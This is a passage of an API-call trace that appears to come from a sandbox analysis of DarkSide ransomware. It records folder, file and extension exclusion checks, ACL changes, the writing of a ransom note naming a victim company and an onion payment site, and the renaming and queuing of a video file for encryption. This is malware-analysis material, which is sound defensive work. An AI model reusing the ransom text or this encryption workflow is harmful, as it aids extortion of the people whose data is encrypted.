0xd [0168.164] _wcsicmp (_Str1="program files (x86)", _Str2="hMUWsCiYUPz2VTz") returned 8 [0168.165] wcslen (_String="program files (x86)") returned 0x13 [0168.165] _wcsicmp (_Str1="programdata", _Str2="hMUWsCiYUPz2VTz") returned 8 [0168.165] wcslen (_String="programdata") returned 0xb [0168.165] _wcsicmp (_Str1="system volume information", _Str2="hMUWsCiYUPz2VTz") returned 11 [0168.165] wcslen (_String="system volume information") returned 0x19 [0168.165] _wcsicmp (_Str1="tor browser", _Str2="hMUWsCiYUPz2VTz") returned 12 [0168.165] wcslen (_String="tor browser") returned 0xb [0168.165] _wcsicmp (_Str1="windows.old", _Str2="hMUWsCiYUPz2VTz") returned 15 [0168.165] wcslen (_String="windows.old") returned 0xb [0168.165] _wcsicmp (_Str1="intel", _Str2="hMUWsCiYUPz2VTz") returned 1 [0168.165] wcslen (_String="intel") returned 0x5 [0168.165] _wcsicmp (_Str1="msocache", _Str2="hMUWsCiYUPz2VTz") returned 5 [0168.165] wcslen (_String="msocache") returned 0x8 [0168.165] _wcsicmp (_Str1="perflogs", _Str2="hMUWsCiYUPz2VTz") returned 8 [0168.165] wcslen (_String="perflogs") returned 0x8 [0168.165] _wcsicmp (_Str1="x64dbg", _Str2="hMUWsCiYUPz2VTz") returned 16 [0168.165] wcslen (_String="x64dbg") returned 0x6 [0168.165] _wcsicmp (_Str1="public", _Str2="hMUWsCiYUPz2VTz") returned 8 [0168.165] wcslen (_String="public") returned 0x6 [0168.165] _wcsicmp (_Str1="all users", _Str2="hMUWsCiYUPz2VTz") returned -7 [0168.165] wcslen (_String="all users") returned 0x9 [0168.165] _wcsicmp (_Str1="default", _Str2="hMUWsCiYUPz2VTz") returned -4 [0168.165] wcslen (_String="default") returned 0x7 [0168.165] wcscpy (in: _Dest=0x1f8e18, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*" [0168.165] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*") returned 0x2a [0168.165] wcscpy (in: _Dest=0x1f8e6a, _Source="hMUWsCiYUPz2VTz" | out: _Dest="hMUWsCiYUPz2VTz") returned="hMUWsCiYUPz2VTz" [0168.165] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0168.165] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0168.167] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.167] GetNamedSecurityInfoW () returned 0x0 [0168.167] SetEntriesInAclW () returned 0x0 [0168.167] SetNamedSecurityInfoW () returned 0x0 [0168.174] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c608) returned 1 [0168.174] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0168.174] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 1 [0168.174] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0168.174] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0168.175] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0168.175] CloseHandle (hObject=0x1bc) returned 1 [0168.176] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0168.176] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.176] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\") returned="" [0168.176] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\") returned 0x39 [0168.176] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0168.176] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x530b6bb0, ftCreationTime.dwHighDateTime=0x1d5e2d0, ftLastAccessTime.dwLowDateTime=0x91ef8960, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91ef8960, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.177] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc41cdd0, ftCreationTime.dwHighDateTime=0x1d5e285, ftLastAccessTime.dwLowDateTime=0x65d78a90, ftLastAccessTime.dwHighDateTime=0x1d5e324, ftLastWriteTime.dwLowDateTime=0x65d78a90, ftLastWriteTime.dwHighDateTime=0x1d5e324, nFileSizeHigh=0x0, nFileSizeLow=0x15581, dwReserved0=0x0, dwReserved1=0x0, cFileName="4b6CH1fkgoEr1XMe.mp4", cAlternateFileName="4B6CH1~1.MP4")) returned 1 [0168.177] _wcsicmp (_Str1="4b6CH1fkgoEr1XMe.mp4", _Str2="README.c06622a1.TXT") returned -62 [0168.177] wcsstr (_Str="4b6CH1fkgoEr1XMe.mp4", _SubStr="README") returned 0x0 [0168.177] _wcsicmp (_Str1="autorun.inf", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 45 [0168.177] wcslen (_String="autorun.inf") returned 0xb [0168.177] _wcsicmp (_Str1="boot.ini", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 46 [0168.177] wcslen (_String="boot.ini") returned 0x8 [0168.177] _wcsicmp (_Str1="bootfont.bin", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 46 [0168.177] wcslen (_String="bootfont.bin") returned 0xc [0168.177] _wcsicmp (_Str1="bootsect.bak", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 46 [0168.177] wcslen (_String="bootsect.bak") returned 0xc [0168.177] _wcsicmp (_Str1="desktop.ini", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 48 [0168.177] wcslen (_String="desktop.ini") returned 0xb [0168.177] _wcsicmp (_Str1="iconcache.db", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 53 [0168.177] wcslen (_String="iconcache.db") returned 0xc [0168.177] _wcsicmp (_Str1="ntldr", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 58 [0168.177] wcslen (_String="ntldr") returned 0x5 [0168.177] _wcsicmp (_Str1="ntuser.dat", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 58 [0168.177] wcslen (_String="ntuser.dat") returned 0xa [0168.177] _wcsicmp (_Str1="ntuser.dat.log", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 58 [0168.177] wcslen (_String="ntuser.dat.log") returned 0xe [0168.177] _wcsicmp (_Str1="ntuser.ini", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 58 [0168.177] wcslen (_String="ntuser.ini") returned 0xa [0168.177] _wcsicmp (_Str1="thumbs.db", _Str2="4b6CH1fkgoEr1XMe.mp4") returned 64 [0168.178] wcslen (_String="thumbs.db") returned 0x9 [0168.178] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0168.178] wcslen (_String="386") returned 0x3 [0168.178] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0168.178] wcslen (_String="adv") returned 0x3 [0168.178] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0168.178] wcslen (_String="ani") returned 0x3 [0168.178] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0168.178] wcslen (_String="bat") returned 0x3 [0168.178] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0168.178] wcslen (_String="bin") returned 0x3 [0168.178] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0168.178] wcslen (_String="cab") returned 0x3 [0168.178] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0168.178] wcslen (_String="cmd") returned 0x3 [0168.178] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0168.178] wcslen (_String="com") returned 0x3 [0168.178] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0168.178] wcslen (_String="cpl") returned 0x3 [0168.178] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0168.178] wcslen (_String="cur") returned 0x3 [0168.178] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0168.178] wcslen (_String="deskthemepack") returned 0xd [0168.178] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0168.178] wcslen (_String="diagcab") returned 0x7 [0168.178] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0168.178] wcslen (_String="diagcfg") returned 0x7 [0168.178] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0168.178] wcslen (_String="diagpkg") returned 0x7 [0168.178] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0168.179] wcslen (_String="dll") returned 0x3 [0168.179] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0168.179] wcslen (_String="drv") returned 0x3 [0168.179] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0168.179] wcslen (_String="exe") returned 0x3 [0168.179] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0168.179] wcslen (_String="hlp") returned 0x3 [0168.179] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0168.179] wcslen (_String="icl") returned 0x3 [0168.179] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0168.179] wcslen (_String="icns") returned 0x4 [0168.179] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0168.179] wcslen (_String="ico") returned 0x3 [0168.179] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0168.179] wcslen (_String="ics") returned 0x3 [0168.179] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0168.179] wcslen (_String="idx") returned 0x3 [0168.179] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0168.179] wcslen (_String="ldf") returned 0x3 [0168.179] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0168.179] wcslen (_String="lnk") returned 0x3 [0168.179] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0168.179] wcslen (_String="mod") returned 0x3 [0168.179] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0168.179] wcslen (_String="mpa") returned 0x3 [0168.179] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0168.179] wcslen (_String="msc") returned 0x3 [0168.179] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0168.179] wcslen (_String="msp") returned 0x3 [0168.179] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0168.179] wcslen (_String="msstyles") returned 0x8 [0168.179] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0168.179] wcslen (_String="msu") returned 0x3 [0168.180] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0168.180] wcslen (_String="nls") returned 0x3 [0168.180] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0168.180] wcslen (_String="nomedia") returned 0x7 [0168.180] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0168.180] wcslen (_String="ocx") returned 0x3 [0168.180] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0168.180] wcslen (_String="prf") returned 0x3 [0168.180] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0168.180] wcslen (_String="ps1") returned 0x3 [0168.180] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0168.180] wcslen (_String="rom") returned 0x3 [0168.180] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0168.180] wcslen (_String="rtp") returned 0x3 [0168.180] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0168.180] wcslen (_String="scr") returned 0x3 [0168.180] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0168.180] wcslen (_String="shs") returned 0x3 [0168.180] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0168.180] wcslen (_String="spl") returned 0x3 [0168.180] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0168.180] wcslen (_String="sys") returned 0x3 [0168.180] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0168.180] wcslen (_String="theme") returned 0x5 [0168.180] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0168.180] wcslen (_String="themepack") returned 0x9 [0168.180] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0168.180] wcslen (_String="wpx") returned 0x3 [0168.180] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0168.180] wcslen (_String="lock") returned 0x4 [0168.180] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0168.181] wcslen (_String="key") returned 0x3 [0168.181] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0168.181] wcslen (_String="hta") returned 0x3 [0168.181] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0168.181] wcslen (_String="msi") returned 0x3 [0168.181] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0168.181] wcslen (_String="pdb") returned 0x3 [0168.181] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0168.181] wcslen (_String="sqlite") returned 0x6 [0168.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz")) returned 0x10 [0168.181] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0168.181] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz" [0168.181] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz") returned 0x38 [0168.181] wcscpy (in: _Dest=0x32400d2, _Source="4b6CH1fkgoEr1XMe.mp4" | out: _Dest="4b6CH1fkgoEr1XMe.mp4") returned="4b6CH1fkgoEr1XMe.mp4" [0168.181] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4", dwFileAttributes=0x80) returned 1 [0168.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\4b6ch1fkgoer1xme.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0168.181] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.182] ReadFile (in: hFile=0x198, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0168.182] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xb16c3691 [0168.182] RtlComputeCrc32 (PartialCrc=0x3691, Buffer=0x32e9a4, Length=0x80) returned 0xef439b34 [0168.183] RtlComputeCrc32 (PartialCrc=0x9b34, Buffer=0x32e9a4, Length=0x80) returned 0x335b8146 [0168.183] RtlComputeCrc32 (PartialCrc=0x8146, Buffer=0x32e9a4, Length=0x80) returned 0xafa180b5 [0168.183] RtlComputeCrc32 (PartialCrc=0x80b5, Buffer=0x32e9a4, Length=0x80) returned 0x10b3e369 [0168.183] CloseHandle (hObject=0x198) returned 1 [0168.183] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0168.183] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4" [0168.183] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4") returned 0x4d [0168.183] wcscpy (in: _Dest=0x3250102, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0168.183] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\4b6ch1fkgoer1xme.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\4b6ch1fkgoer1xme.mp4.c06622a1"), dwFlags=0x8) returned 1 [0168.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hMUWsCiYUPz2VTz\\4b6CH1fkgoEr1XMe.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hmuwsciyupz2vtz\\4b6ch1fkgoer1xme.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x198 [0168.186] CreateIoCompletionPort (FileHandle=0x198, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0168.186] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0168.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x25e7539f [0168.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50ef7ccf [0168.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x546b7710 [0168.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb8d5634 [0168.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a2d8085 [0168.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x680ed225 [0168.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5de134c0 [0168.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71ea1833 [0168.196] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xfa023143 [0168.196] RtlComputeCrc32 (PartialCrc=0x3143, Buffer=0x2690094, Length=0x80) returned 0x46bc2e74 [0168.196] RtlComputeCrc32 (PartialCrc=0x2e74, Buffer=0x2690094, Length=0x80) returned 0xdfeb246a [0168.196] RtlComputeCrc32 (PartialCrc=0x246a, Buffer=0x2690094, Length=0x80) returned 0xdcf3383f [0168.196] RtlComputeCrc32 (PartialCrc=0x383f, Buffer=0x2690094, Length=0x80) returned 0x4828bcc4 [0168.196] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0168.197] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0168.197] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0168.197] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdcecd60, ftCreationTime.dwHighDateTime=0x1d5dea3, ftLastAccessTime.dwLowDateTime=0xf4e3e20, ftLastAccessTime.dwHighDateTime=0x1d5dc09, ftLastWriteTime.dwLowDateTime=0xf4e3e20, ftLastWriteTime.dwHighDateTime=0x1d5dc09, nFileSizeHigh=0x0, nFileSizeLow=0x7474, dwReserved0=0x0, dwReserved1=0x0, cFileName="4o6tuvsKWxaerB.mkv", cAlternateFileName="4O6TUV~1.MKV")) returned 1 [0168.197] _wcsicmp (_Str1="4o6tuvsKWxaerB.mkv", _Str2="README.c06622a1.TXT") returned -62 [0168.197] wcsstr (_Str="4o6tuvsKWxaerB.mkv", _SubStr="README") returned 0x0 [0168.197] _wcsicmp (_Str1="autorun.inf", _Str2="4o6tuvsKWxaerB.mkv") returned 45 [0168.197] wcslen (_String="autorun.inf") returned 0xb [0168.197] _wcsicmp (_Str1="boot.ini", _Str2="4o6tuvsKWxaerB.mkv") returned 46 [0168.197] wcslen (_String="boot.ini") returned 0x8 [0168.197] _wcsicmp (_Str1="bootfont.bin", _Str2="4o6tuvsKWxaerB.mkv") returned 46 [0168.197] wcslen (_String="bootfont.bin") returned 0xc [0168.197] _wcsicmp (_Str1="bootsect.bak", _Str2="4o6tuvsKWxaerB.mkv") returned 46 [0168.197] wcslen (_String="bootsect.bak") returned 0xc [0168.197] _wcsicmp (_Str1="desktop.ini", _Str2="4o6tuvsKWxaerB.mkv") returned 48 [0168.197] wcslen (_String="desktop.ini") returned 0xb [0168.197] _wcsicmp (_Str1="iconcache.db", _Str2="4o6tuvsKWxaerB.mkv") returned 53 [0168.197] wcslen (_String="iconcache.db") returned 0xc [0168.197] _wcsicmp (_Str1="ntldr", _Str2="4o6tuvsKWxaerB.mkv") returned 58 [0168.197] wcslen (_String="ntldr") returned 0x5 [0168.197] _wcsicmp (_Str1="ntuser.dat", _Str2="4o6tuvsKWxaerB.mkv") returned 58 [0168.197] wcslen (_String="ntuser.dat") returned 0xa [0168.197] _wcsicmp (_Str1="ntuser.dat.log", _Str2="4o6tuvsKWxaerB.mkv") returned 58 [0168.197] wcslen (_String="ntuser.dat.log") returned 0xe [0168.197] _wcsicmp (_Str1="ntuser.ini", _Str2="4o6tuvsKWxaerB.mkv") returned 58 [0168.197] wcslen (_String="ntuser.ini") returned 0xa [0168.197] _wcsicmp (_Str1="thumbs.db", _Str2="4o6tuvsKWxaerB.mkv") returned 64 [0168.197] wcslen (_String="thumbs.db") returned 0x9 [0168.197] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0168.197] wcslen (_String="386") returned 0x3 [0168.197] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0168.197] wcslen (_String="adv") returned 0x3 [0168.197] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0168.197] wcslen (_String="ani") returned 0x3 [0168.197] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0168.198] wcslen (_String="bat") returned 0x3 [0168.198] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0168.198] wcslen (_String="bin") returned 0x3 [0168.198] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0168.198] wcslen (_String="cab") returned 0x3 [0168.198] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0168.198] wcslen (_String="cmd") returned 0x3 [0168.198] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0168.198] wcslen (_String="com") returned 0x3 [0168.198] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0168.198] wcslen (_String="cpl") returned 0x3 [0168.198] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0168.198] wcslen (_String="cur") returned 0x3 [0168.198] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0168.198] wcslen (_String="deskthemepack") returned 0xd [0168.198] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0168.198] wcslen (_String="diagcab") returned 0x7 [0168.198] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0168.198] wcslen (_String="diagcfg") returned 0x7 [0168.198] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0168.198] wcslen (_String="diagpkg") returned 0x7 [0168.198] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0168.198] wcslen (_String="dll") returned 0x3 [0168.198] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0168.198] wcslen (_String="drv") returned 0x3 [0168.198] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0168.198] wcslen (_String="exe") returned 0x3 [0168.198] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0168.198] wcslen 